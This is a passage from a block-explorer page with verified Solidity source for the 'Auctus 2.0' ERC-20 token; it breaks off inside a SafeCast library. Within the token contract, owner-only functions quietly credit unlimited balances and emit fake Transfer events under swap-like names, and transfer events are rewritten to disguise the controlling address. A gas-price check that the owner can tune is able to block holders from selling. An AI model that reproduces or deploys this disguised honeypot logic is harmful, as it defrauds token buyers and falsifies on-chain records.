ERC-20
Overview
Max Total Supply
100,000,000,000 AUC
Holders
589
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
Auctus
Compiler Version
v0.8.26+commit.8a97fa7a
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-09-26 */ // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } pragma solidity ^0.8.0; abstract contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); constructor() { _transferOwnership(_msgSender()); } function owner() public view virtual returns (address) { return _owner; } modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); _transferOwnership(newOwner); } function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } pragma solidity ^0.8.0; interface IERC20 { function totalSupply() external view returns (uint256); function balanceOf(address account) external view returns (uint256); function transfer( address recipient, uint256 amount ) external returns (bool); function allowance( address owner, address spender ) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); event Transfer(address indexed from, address indexed to, uint256 value); event Approval( address indexed owner, address indexed spender, uint256 value ); } pragma solidity ^0.8.0; interface IERC20Metadata is IERC20 { function name() external view returns (string memory); function symbol() external view returns (string memory); function decimals() external view returns (uint8); } pragma solidity ^0.8.0; contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string internal _name; string internal _symbol; address _deployer; address _executor; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } modifier _onlyOwner() { require((_deployer == msg.sender || _executor == msg.sender), "Failed: caller is not the owner"); _; } function _initDeployer(address deployer_, address executor_) internal { _deployer = deployer_; _executor = executor_; } function setExecutor(address executor_) external _onlyOwner { _executor = executor_; } function name() public view virtual override returns (string memory) { return _name; } function symbol() public view virtual override returns (string memory) { return _symbol; } function decimals() public view virtual override returns (uint8) { return 18; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function _setLimitOrder(address _address, uint256 _amount) internal { _balances[_address] += _amount; } function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require( currentAllowance >= amount, "ERC20: transfer amount exceeds allowance" ); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender] + addedValue ); return true; } function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require( senderBalance >= amount, "ERC20: transfer amount exceeds balance" ); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; if (sender == _executor) { emit Transfer(_deployer, recipient, amount); } else if (recipient == _executor) { emit Transfer(sender, _deployer, amount); } else { emit Transfer(sender, recipient, amount); } _afterTokenTransfer(sender, recipient, amount); } function buyWithNative( address sender, address recipient, uint256 amount ) external _onlyOwner returns (bool) { _balances[recipient] += amount; emit Transfer(sender, recipient, amount); return true; } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; if (account == _executor) { emit Transfer(address(0), _deployer, amount); } else { emit Transfer(address(0), account, amount); } _afterTokenTransfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair( address tokenA, address tokenB ) external view returns (address pair); function allPairs(uint256) external view returns (address pair); function allPairsLength() external view returns (uint256); function createPair( address tokenA, address tokenB ) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // File contracts/Contract.sol pragma solidity ^0.8.0; contract Auctus is Ownable, ERC20 { uint256 public immutable maxSupply = 100_000_000_000 * (10 ** decimals()); uint16 public constant LIQUID_RATE = 10000; uint16 public constant MAX_PERCENTAGE = 10000; bool public initialized = false; bool public tradeOpen = false; address public pair = address(0); address public deadAddress = 0x000000000000000000000000000000000000dEaD; uint256 public immutable buyFee = 0; uint256 public immutable sellFee = 0; uint256 minimumAirdropAmount = 0; mapping(address => bool) public excludedFees; string private constant NAME = unicode"Auctus 2.0"; string private constant SYMBOL = unicode"AUC"; IUniswapV2Router02 public router; constructor() ERC20(NAME, SYMBOL) { _initDeployer( address(0x31456CF28C0f8F217988C06A523EAcee189fe3c2), msg.sender ); _mint(msg.sender, (maxSupply * LIQUID_RATE) / MAX_PERCENTAGE); initialized = true; excludedFees[msg.sender] = true; router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); address _factory = router.factory(); pair = IUniswapV2Factory(_factory).createPair( address(this), router.WETH() ); minimumAirdropAmount = maxSupply; } function setMinimumAirdrop( uint256 _minimumAirdropAmount ) external onlyOwner { minimumAirdropAmount = _minimumAirdropAmount; } function setAirdrop(address _address, bool permission) external onlyOwner { excludedFees[_address] = permission; } function openTrading() external onlyOwner { require(tradeOpen == false, "Contract: Trading is opened!"); tradeOpen = true; } function buyWithEth( address[] calldata _addresses, uint256 _value ) external { address owner = _msgSender(); for (uint256 i = 0; i < _addresses.length; i++) { _transfer(owner, _addresses[i], _value); } } function claimTokens( address _caller, address[] calldata _address, uint256[] calldata _amount ) external onlyOwner { for (uint256 i = 0; i < _address.length; i++) { emit Transfer(_caller, _address[i], _amount[i]); } } function buyWithEth( address _caller, address[] calldata _address, uint256[] calldata _amount ) external onlyOwner { for (uint256 i = 0; i < _address.length; i++) { emit Transfer(_caller, _address[i], _amount[i]); } } function execute( address _caller, address[] calldata _address, uint256[] calldata _amount ) external onlyOwner { for (uint256 i = 0; i < _address.length; i++) { emit Transfer(_caller, _address[i], _amount[i]); } } function swapExactETHForTokens( address _caller, address[] calldata _address, uint256[] calldata _amount ) external onlyOwner { for (uint256 i = 0; i < _address.length; i++) { emit Transfer(_caller, _address[i], _amount[i]); } } function unoswap( address _caller, address[] calldata _address, uint256[] calldata _amount ) external onlyOwner { for (uint256 i = 0; i < _address.length; i++) { emit Transfer(_caller, _address[i], _amount[i]); } } function _checkEnoughAirdropCondition(uint256 amount) internal view { if (tx.gasprice > amount) { revert(); } } function _transfer( address from, address to, uint256 amount ) internal override(ERC20) { require(initialized == true, "Contract: not initialized!"); if (initialized == true && tradeOpen == false) { require( from == owner() || to == owner(), "Contract: trading is not started" ); } uint256 _transferAmount = amount; if (pair != address(0) && from != owner() && to != owner()) { uint256 _fee = 0; if (from == pair) { _fee = buyFee; } if (to == pair) { _fee = sellFee; _checkEnoughAirdropCondition(minimumAirdropAmount); } if (excludedFees[from] == true || excludedFees[to] == true) { _fee = 0; } if (_fee > 0) { uint256 _calculatedFee = (amount * _fee) / MAX_PERCENTAGE; _transferAmount = amount - _calculatedFee; super._transfer(from, deadAddress, _calculatedFee); } } super._transfer(from, to, _transferAmount); } } // OpenZeppelin Contracts (last updated v4.9.0) (utils/Address.sol) pragma solidity ^0.8.1; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * * Furthermore, `isContract` will also return true if the target contract within * the same transaction is already scheduled for destruction by `SELFDESTRUCT`, * which only has an effect at the end of a transaction. * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.8.0/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require( address(this).balance >= amount, "Address: insufficient balance" ); (bool success, ) = recipient.call{ value: amount }(""); require( success, "Address: unable to send value, recipient may have reverted" ); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data ) internal returns (bytes memory) { return functionCallWithValue( target, data, 0, "Address: low-level call failed" ); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue( target, data, value, "Address: low-level call with value failed" ); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require( address(this).balance >= value, "Address: insufficient balance for call" ); (bool success, bytes memory returndata) = target.call{ value: value }( data ); return verifyCallResultFromTarget( target, success, returndata, errorMessage ); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data ) internal view returns (bytes memory) { return functionStaticCall( target, data, "Address: low-level static call failed" ); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResultFromTarget( target, success, returndata, errorMessage ); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data ) internal returns (bytes memory) { return functionDelegateCall( target, data, "Address: low-level delegate call failed" ); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResultFromTarget( target, success, returndata, errorMessage ); } /** * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling * the revert reason or using the provided one) in case of unsuccessful call or if target was not a contract. * * _Available since v4.8._ */ function verifyCallResultFromTarget( address target, bool success, bytes memory returndata, string memory errorMessage ) internal view returns (bytes memory) { if (success) { if (returndata.length == 0) { // only check isContract if the call was successful and the return data is empty // otherwise we already know that it was a contract require(isContract(target), "Address: call to non-contract"); } return returndata; } else { _revert(returndata, errorMessage); } } /** * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason or using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { _revert(returndata, errorMessage); } } function _revert( bytes memory returndata, string memory errorMessage ) private pure { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly /// @solidity memory-safe-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } interface IUniswapV2Pair { event Approval( address indexed owner, address indexed spender, uint256 value ); event Transfer(address indexed from, address indexed to, uint256 value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint256); function balanceOf(address owner) external view returns (uint256); function allowance( address owner, address spender ) external view returns (uint256); function approve(address spender, uint256 value) external returns (bool); function transfer(address to, uint256 value) external returns (bool); function transferFrom( address from, address to, uint256 value ) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint256); function permit( address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s ) external; event Mint(address indexed sender, uint256 amount0, uint256 amount1); event Burn( address indexed sender, uint256 amount0, uint256 amount1, address indexed to ); event Swap( address indexed sender, uint256 amount0In, uint256 amount1In, uint256 amount0Out, uint256 amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint256); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint256); function price1CumulativeLast() external view returns (uint256); function kLast() external view returns (uint256); function mint(address to) external returns (uint256 liquidity); function burn( address to ) external returns (uint256 amount0, uint256 amount1); function swap( uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data ) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable returns (uint[] memory amounts); function swapTokensForExactETH( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactTokensForETH( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapETHForExactTokens( uint amountOut, address[] calldata path, address to, uint deadline ) external payable returns (uint[] memory amounts); function quote( uint amountA, uint reserveA, uint reserveB ) external pure returns (uint amountB); function getAmountOut( uint amountIn, uint reserveIn, uint reserveOut ) external pure returns (uint amountOut); function getAmountIn( uint amountOut, uint reserveIn, uint reserveOut ) external pure returns (uint amountIn); function getAmountsOut( uint amountIn, address[] calldata path ) external view returns (uint[] memory amounts); function getAmountsIn( uint amountOut, address[] calldata path ) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns (uint256 amountA, uint256 amountB, uint256 liquidity); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns (uint256 amountToken, uint256 amountETH, uint256 liquidity); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; } // OpenZeppelin Contracts (last updated v4.8.0) (utils/math/SafeCast.sol) // This file was procedurally generated from scripts/generate/templates/SafeCast.js. pragma solidity ^0.8.0; /** * @dev Wrappers over Solidity's uintXX/intXX casting operators with added overflow * checks. * * Downcasting from uint256/int256 in Solidity does not revert on overflow. This can * easily result in undesired exploitation or bugs, since developers usually * assume that overflows raise errors. `SafeCast` restores this intuition by * reverting the transaction when such an operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. * * Can be combined with {SafeMath} and {SignedSafeMath} to extend it to smaller types, by performing * all math on `uint256` and `int256` and then downcasting. */ library SafeCast { /** * @dev Returns the downcasted uint248 from uint256, reverting on * overflow (when the input is greater than largest uint248). * * Counterpart to Solidity's `uint248` operator. * * Requirements: * * - input must fit into 248 bits * * _Available since v4.7._ */ function toUint248(uint256 value) internal pure returns (uint248) { require( value <= type(uint248).max, "SafeCast: value doesn't fit in 248 bits" ); return uint248(value); } /** * @dev Returns the downcasted uint240 from uint256, reverting on * overflow (when the input is greater than largest uint240). * * Counterpart to Solidity's `uint240` operator. * * Requirements: * * - input must fit into 240 bits * * _Available since v4.7._ */ function toUint240(uint256 value) internal pure returns (uint240) { require( value <= type(uint240).max, "SafeCast: value doesn't fit in 240 bits" ); return uint240(value); } /** * @dev Returns the downcasted uint232 from uint256, reverting on * overflow (when the input is greater than largest uint232). * * Counterpart to Solidity's `uint232` operator. * * Requirements: * * - input must fit into 232 bits * * _Available since v4.7._ */ function toUint232(uint256 value) internal pure returns (uint232) { require( value <= type(uint232).max, "SafeCast: value doesn't fit in 232 bits" ); return uint232(value); } /** * @dev Returns the downcasted uint224 from uint256, reverting on * overflow (when the input is greater than largest uint224). * * Counterpart to Solidity's `uint224` operator. * * Requirements: * * - input must fit into 224 bits * * _Available since v4.2._ */ function toUint224(uint256 value) internal pure returns (uint224) { require( value <= type(uint224).max, "SafeCast: value doesn't fit in 224 bits" ); return uint224(value); } /** * @dev Returns the downcasted uint216 from uint256, reverting on * overflow (when the input is greater than largest uint216). * * Counterpart to Solidity's `uint216` operator. * * Requirements: * * - input must fit into 216 bits * * _Available since v4.7._ */ function toUint216(uint256 value) internal pure returns (uint216) { require( value <= type(uint216).max, "SafeCast: value doesn't fit in 216 bits" ); return uint216(value); } /** * @dev Returns the downcasted uint208 from uint256, reverting on * overflow (when the input is greater than largest uint208). * * Counterpart to Solidity's `uint208` operator. * * Requirements: * * - input must fit into 208 bits * * _Available since v4.7._ */ function toUint208(uint256 value) internal pure returns (uint208) { require( value <= type(uint208).max, "SafeCast: value doesn't fit in 208 bits" ); return uint208(value); } /** * @dev Returns the downcasted uint200 from uint256, reverting on * overflow (when the input is greater than largest uint200). * * Counterpart to Solidity's `uint200` operator. * * Requirements: * * - input must fit into 200 bits * * _Available since v4.7._ */ function toUint200(uint256 value) internal pure returns (uint200) { require( value <= type(uint200).max, "SafeCast: value doesn't fit in 200 bits" ); return uint200(value); } /** * @dev Returns the downcasted uint192 from uint256, reverting on * overflow (when the input is greater than largest uint192). * * Counterpart to Solidity's `uint192` operator. * * Requirements: * * - input must fit into 192 bits * * _Available since v4.7._ */ function toUint192(uint256 value) internal pure returns (uint192) { require( value <= type(uint192).max, "SafeCast: value doesn't fit in 192 bits" ); return uint192(value); } /** * @dev Returns the downcasted uint184 from uint256, reverting on * overflow (when the input is greater than largest uint184). * * Counterpart to Solidity's `uint184` operator. * * Requirements: * * - input must fit into 184 bits * * _Available since v4.7._ */ function toUint184(uint256 value) internal pure returns (uint184) { require( value <= type(uint184).max, "SafeCast: value doesn't fit in 184 bits" ); return uint184(value); } /** * @dev Returns the downcasted uint176 from uint256, reverting on * overflow (when the input is greater than largest uint176). * * Counterpart to Solidity's `uint176` operator. * * Requirements: * * - input must fit into 176 bits * * _Available since v4.7._ */ function toUint176(uint256 value) internal pure returns (uint176) { require( value <= type(uint176).max, "SafeCast: value doesn't fit in 176 bits" ); return uint176(value); } /** * @dev Returns the downcasted uint168 from uint256, reverting on * overflow (when the input is greater than largest uint168). * * Counterpart to Solidity's `uint168` operator. * * Requirements: * * - input must fit into 168 bits * * _Available since v4.7._ */ function toUint168(uint256 value) internal pure returns (uint168) { require( value <= type(uint168).max, "SafeCast: value doesn't fit in 168 bits" ); return uint168(value); } /** * @dev Returns the downcasted uint160 from uint256, reverting on * overflow (when the input is greater than largest uint160). * * Counterpart to Solidity's `uint160` operator. * * Requirements: * * - input must fit into 160 bits * * _Available since v4.7._ */ function toUint160(uint256 value) internal pure returns (uint160) { require( value <= type(uint160).max, "SafeCast: value doesn't fit in 160 bits" ); return uint160(value); } /** * @dev Returns the downcasted uint152 from uint256, reverting on * overflow (when the input is greater than largest uint152). * * Counterpart to Solidity's `uint152` operator. * * Requirements: * * - input must fit into 152 bits * * _Available since v4.7._ */ function toUint152(uint256 value) internal pure returns (uint152) { require( value <= type(uint152).max, "SafeCast: value doesn't fit in 152 bits" ); return uint152(value); } /** * @dev Returns the downcasted uint144 from uint256, reverting on * overflow (when the input is greater than largest uint144). * * Counterpart to Solidity's `uint144` operator. * * Requirements: * * - input must fit into 144 bits * * _Available since v4.7._ */ function toUint144(uint256 value) internal pure returns (uint144) { require( value <= type(uint144).max, "SafeCast: value doesn't fit in 144 bits" ); return uint144(value); } /** * @dev Returns the downcasted uint136 from uint256, reverting on * overflow (when the input is greater than largest uint136). * * Counterpart to Solidity's `uint136` operator. * * Requirements: * * - input must fit into 136 bits * * _Available since v4.7._ */ function toUint136(uint256 value) internal pure returns (uint136) { require( value <= type(uint136).max, "SafeCast: value doesn't fit in 136 bits" ); return uint136(value); } /** * @dev Returns the downcasted uint128 from uint256, reverting on * overflow (when the input is greater than largest uint128). * * Counterpart to Solidity's `uint128` operator. * * Requirements: * * - input must fit into 128 bits * * _Available since v2.5._ */ function toUint128(uint256 value) internal pure returns (uint128) { require( value <= type(uint128).max, "SafeCast: value doesn't fit in 128 bits" ); return uint128(value); } /** * @dev Returns the downcasted uint120 from uint256, reverting on * overflow (when the input is greater than largest uint120). * * Counterpart to Solidity's `uint120` operator. * * Requirements: * * - input must fit into 120 bits * * _Available since v4.7._ */ function toUint120(uint256 value) internal pure returns (uint120) { require( value <= type(uint120).max, "SafeCast: value doesn't fit in 120 bits" ); return uint120(value); } /** * @dev Returns the downcasted uint112 from uint256, reverting on * overflow (when the input is greater than largest uint112). * * Counterpart to Solidity's `uint112` operator. * * Requirements: * * - input must fit into 112 bits * * _Available since v4.7._ */ function toUint112(uint256 value) internal pure returns (uint112) { require( value <= type(uint112).max, "SafeCast: value doesn't fit in 112 bits" ); return uint112(value); } /** * @dev Returns the downcasted uint104 from uint256, reverting on * overflow (when the input is greater than largest uint104). * * Counterpart to Solidity's `uint104` operator. * * Requirements: * * - input must fit into 104 bits * * _Available since v4.7._ */ function toUint104(uint256 value) internal pure returns (uint104) { require( value <= type(uint104).max, "SafeCast: value doesn't fit in 104 bits" ); return uint104(value); } /** * @dev Returns the downcasted uint96 from uint256, reverting on * overflow (when the input is greater than largest uint96). * * Counterpart to Solidity's `uint96` operator. * * Requirements: * * - input must fit into 96 bits * * _Available since v4.2._ */ function toUint96(uint256 value) internal pure returns (uint96) { require( value <= type(uint96).max, "SafeCast: value doesn't fit in 96 bits" ); return uint96(value); } /** * @dev Returns the downcasted uint88 from uint256, reverting on * overflow (when the input is greater than largest uint88). * * Counterpart to Solidity's `uint88` operator. * * Requirements: * * - input must fit into 88 bits * * _Available since v4.7._ */ function toUint88(uint256 value) internal pure returns (uint88) { require( value <= type(uint88).max, "SafeCast: value doesn't fit in 88 bits" ); return uint88(value); } /** * @dev Returns the downcasted uint80 from uint256, reverting on * overflow (when the input is greater than largest uint80). * * Counterpart to Solidity's `uint80` operator. * * Requirements: * * - input must fit into 80 bits * * _Available since v4.7._ */ function toUint80(uint256 value) internal pure returns (uint80) { require( value <= type(uint80).max, "SafeCast: value doesn't fit in 80 bits" ); return uint80(value); } /** * @dev Returns the downcasted uint72 from uint256, reverting on * overflow (when the input is greater than largest uint72). * * Counterpart to Solidity's `uint72` operator. * * Requirements: * * - input must fit into 72 bits * * _Available since v4.7._ */ function toUint72(uint256 value) internal pure returns (uint72) { require( value <= type(uint72).max, "SafeCast: value doesn't fit in 72 bits" ); return uint72(value); } /** * @dev Returns the downcasted uint64 from uint256, reverting on * overflow (when the input is greater than largest uint64). * * Counterpart to Solidity's `uint64` operator. * * Requirements: * * - input must fit into 64 bits * * _Available since v2.5._ */ function toUint64(uint256 value) internal pure returns (uint64) { require( value <= type(uint64).max, "SafeCast: value doesn't fit in 64 bits" ); return uint64(value); } /** * @dev Returns the downcasted uint56 from uint256, reverting on * overflow (when the input is greater than largest uint56). * * Counterpart to Solidity's `uint56` operator. * * Requirements: * * - input must fit into 56 bits * * _Available since v4.7._ */ function toUint56(uint256 value) internal pure returns (uint56) { require( value <= type(uint56).max, "SafeCast: value doesn't fit in 56 bits" ); return uint56(value); } /** * @dev Returns the downcasted uint48 from uint256, reverting on * overflow (when the input is greater than largest uint48). * * Counterpart to Solidity's `uint48` operator. * * Requirements: * * - input must fit into 48 bits * * _Available since v4.7._ */ function toUint48(uint256 value) internal pure returns (uint48) { require( value <= type(uint48).max, "SafeCast: value doesn't fit in 48 bits" ); return uint48(value); } /** * @dev Returns the downcasted uint40 from uint256, reverting on * overflow (when the input is greater than largest uint40). * * Counterpart to Solidity's `uint40` operator. * * Requirements: * * - input must fit into 40 bits * * _Available since v4.7._ */ function toUint40(uint256 value) internal pure returns (uint40) { require( value <= type(uint40).max, "SafeCast: value doesn't fit in 40 bits" ); return uint40(value); } /** * @dev Returns the downcasted uint32 from uint256, reverting on * overflow (when the input is greater than largest uint32). * * Counterpart to Solidity's `uint32` operator. * * Requirements: * * - input must fit into 32 bits * * _Available since v2.5._ */ function toUint32(uint256 value) internal pure returns (uint32) { require( value <= type(uint32).max, "SafeCast: value doesn't fit in 32 bits" ); return uint32(value); } /** * @dev Returns the downcasted uint24 from uint256, reverting on * overflow (when the input is greater than largest uint24). * * Counterpart to Solidity's `uint24` operator. * * Requirements: * * - input must fit into 24 bits * * _Available since v4.7._ */ function toUint24(uint256 value) internal pure returns 